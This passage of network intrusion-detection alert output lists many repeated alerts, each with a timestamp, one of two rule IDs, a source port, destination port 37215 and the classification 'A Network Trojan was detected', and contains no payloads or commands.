          Timestamp:06/08/24-15:05:24.295760
          SID:2835222
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179626
          SID:2829579
          Source Port:55082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160848
          SID:2829579
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788824
          SID:2829579
          Source Port:45804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895599
          SID:2829579
          Source Port:33202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746946
          SID:2835222
          Source Port:49034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175087
          SID:2835222
          Source Port:58600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176355
          SID:2829579
          Source Port:41540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016682
          SID:2835222
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829889
          SID:2829579
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600057
          SID:2829579
          Source Port:54798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668611
          SID:2835222
          Source Port:52700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158864
          SID:2835222
          Source Port:37290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161712
          SID:2835222
          Source Port:43724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108029
          SID:2829579
          Source Port:60392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600076
          SID:2829579
          Source Port:39016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861318
          SID:2835222
          Source Port:37476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798854
          SID:2835222
          Source Port:56126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739345
          SID:2829579
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911612
          SID:2829579
          Source Port:32812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731052
          SID:2829579
          Source Port:55540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805965
          SID:2829579
          Source Port:53022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147752
          SID:2829579
          Source Port:39636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169396
          SID:2829579
          Source Port:56484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891199
          SID:2835222
          Source Port:45842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746396
          SID:2829579
          Source Port:57726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514847
          SID:2835222
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081623
          SID:2835222
          Source Port:53432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403766
          SID:2835222
          Source Port:42388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351966
          SID:2829579
          Source Port:51048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258613
          SID:2829579
          Source Port:37846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162834
          SID:2829579
          Source Port:43854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017968
          SID:2835222
          Source Port:58618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740609
          SID:2835222
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601910
          SID:2835222
          Source Port:49684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238575
          SID:2835222
          Source Port:41212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241647
          SID:2829579
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019931
          SID:2829579
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041342
          SID:2835222
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025884
          SID:2835222
          Source Port:56492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819262
          SID:2829579
          Source Port:44460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188293
          SID:2829579
          Source Port:43298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466554
          SID:2835222
          Source Port:49436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554800
          SID:2835222
          Source Port:44628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745233
          SID:2829579
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890861
          SID:2829579
          Source Port:57922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.124968
          SID:2835222
          Source Port:35008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130075
          SID:2835222
          Source Port:45796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446728
          SID:2829579
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133780
          SID:2829579
          Source Port:36704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271336
          SID:2829579
          Source Port:34562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160418
          SID:2835222
          Source Port:39836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516758
          SID:2835222
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513660
          SID:2829579
          Source Port:55952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513753
          SID:2835222
          Source Port:36326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041023
          SID:2835222
          Source Port:38336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262331
          SID:2835222
          Source Port:51080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264025
          SID:2829579
          Source Port:40144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306649
          SID:2829579
          Source Port:60146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729330
          SID:2835222
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075570
          SID:2829579
          Source Port:37794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396074
          SID:2835222
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733457
          SID:2829579
          Source Port:58650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306672
          SID:2835222
          Source Port:50904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.793965
          SID:2829579
          Source Port:59098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901760
          SID:2835222
          Source Port:38806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896391
          SID:2835222
          Source Port:35800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038484
          SID:2829579
          Source Port:57286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796216
          SID:2835222
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516143
          SID:2835222
          Source Port:60034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731450
          SID:2829579
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192409
          SID:2829579
          Source Port:59654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302556
          SID:2829579
          Source Port:37842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062877
          SID:2835222
          Source Port:45994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163232
          SID:2829579
          Source Port:54864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896860
          SID:2835222
          Source Port:40330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663853
          SID:2829579
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745907
          SID:2829579
          Source Port:47126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787298
          SID:2829579
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172878
          SID:2829579
          Source Port:59794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606405
          SID:2835222
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156107
          SID:2829579
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667490
          SID:2829579
          Source Port:45388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075765
          SID:2835222
          Source Port:33190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271265
          SID:2829579
          Source Port:52402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131484
          SID:2829579
          Source Port:41928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275293
          SID:2829579
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705770
          SID:2829579
          Source Port:54452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735059
          SID:2829579
          Source Port:48230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781929
          SID:2829579
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891231
          SID:2829579
          Source Port:44920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149272
          SID:2829579
          Source Port:39292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742466
          SID:2835222
          Source Port:58538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177038
          SID:2835222
          Source Port:52618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130610
          SID:2835222
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159159
          SID:2829579
          Source Port:55106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351721
          SID:2829579
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355559
          SID:2829579
          Source Port:33888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160512
          SID:2829579
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883920
          SID:2829579
          Source Port:39588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827477
          SID:2835222
          Source Port:47912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444456
          SID:2829579
          Source Port:56796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508756
          SID:2829579
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440601
          SID:2835222
          Source Port:49314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667697
          SID:2835222
          Source Port:33204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747566
          SID:2835222
          Source Port:60976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808616
          SID:2835222
          Source Port:43600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517798
          SID:2829579
          Source Port:48746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672314
          SID:2829579
          Source Port:49496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240323
          SID:2829579
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822723
          SID:2835222
          Source Port:37024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548439
          SID:2835222
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351021
          SID:2829579
          Source Port:55290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551688
          SID:2829579
          Source Port:56770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552040
          SID:2835222
          Source Port:49988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114370
          SID:2829579
          Source Port:43144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731388
          SID:2835222
          Source Port:37302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014621
          SID:2835222
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467067
          SID:2835222
          Source Port:33996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356237
          SID:2835222
          Source Port:56312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099448
          SID:2829579
          Source Port:40186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378243
          SID:2835222
          Source Port:58286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598616
          SID:2835222
          Source Port:35758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447206
          SID:2835222
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732259
          SID:2829579
          Source Port:38742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670204
          SID:2829579
          Source Port:38494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.809128
          SID:2835222
          Source Port:54736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896562
          SID:2835222
          Source Port:60774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732601
          SID:2829579
          Source Port:54574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891744
          SID:2835222
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057909
          SID:2835222
          Source Port:54036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271689
          SID:2835222
          Source Port:40576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044249
          SID:2829579
          Source Port:48562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542865
          SID:2835222
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517265
          SID:2835222
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787690
          SID:2835222
          Source Port:33710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150349
          SID:2835222
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441022
          SID:2829579
          Source Port:34258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857415
          SID:2829579
          Source Port:41576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155518
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179854
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822927
          SID:2835222
          Source Port:45094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789770
          SID:2835222
          Source Port:42916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407223
          SID:2829579
          Source Port:58444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512253
          SID:2829579
          Source Port:52902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115330
          SID:2835222
          Source Port:38816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747312
          SID:2829579
          Source Port:44426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461219
          SID:2835222
          Source Port:32798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510384
          SID:2835222
          Source Port:38538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352927
          SID:2835222
          Source Port:50016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356419
          SID:2835222
          Source Port:53612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177870
          SID:2835222
          Source Port:35866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730203
          SID:2829579
          Source Port:50854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.831724
          SID:2829579
          Source Port:40798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242567
          SID:2829579
          Source Port:60220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783657
          SID:2829579
          Source Port:60518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511687
          SID:2829579
          Source Port:35974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152693
          SID:2835222
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461591
          SID:2835222
          Source Port:58514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440752
          SID:2835222
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893454
          SID:2829579
          Source Port:53928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471996
          SID:2829579
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897192
          SID:2829579
          Source Port:39864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892461
          SID:2829579
          Source Port:39418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055381
          SID:2829579
          Source Port:38242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152604
          SID:2829579
          Source Port:35314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542606
          SID:2829579
          Source Port:39992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160776
          SID:2835222
          Source Port:40562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517728
          SID:2835222
          Source Port:40436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855189
          SID:2829579
          Source Port:39298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471545
          SID:2829579
          Source Port:59220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667422
          SID:2829579
          Source Port:49870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353425
          SID:2829579
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832992
          SID:2835222
          Source Port:58708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857366
          SID:2829579
          Source Port:56370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159308
          SID:2835222
          Source Port:38564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670288
          SID:2829579
          Source Port:54004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546540
          SID:2835222
          Source Port:40224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403713
          SID:2829579
          Source Port:56114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516159
          SID:2829579
          Source Port:59578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729774
          SID:2829579
          Source Port:42034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273486
          SID:2835222
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744269
          SID:2835222
          Source Port:57836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242189
          SID:2835222
          Source Port:51940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264773
          SID:2829579
          Source Port:45286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057928
          SID:2835222
          Source Port:55346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462154
          SID:2829579
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602305
          SID:2829579
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114634
          SID:2835222
          Source Port:43968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189193
          SID:2829579
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039105
          SID:2835222
          Source Port:43380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110127
          SID:2829579
          Source Port:43592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264202
          SID:2829579
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741071
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352856
          SID:2835222
          Source Port:35916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179558
          SID:2829579
          Source Port:33644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861564
          SID:2835222
          Source Port:55514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791663
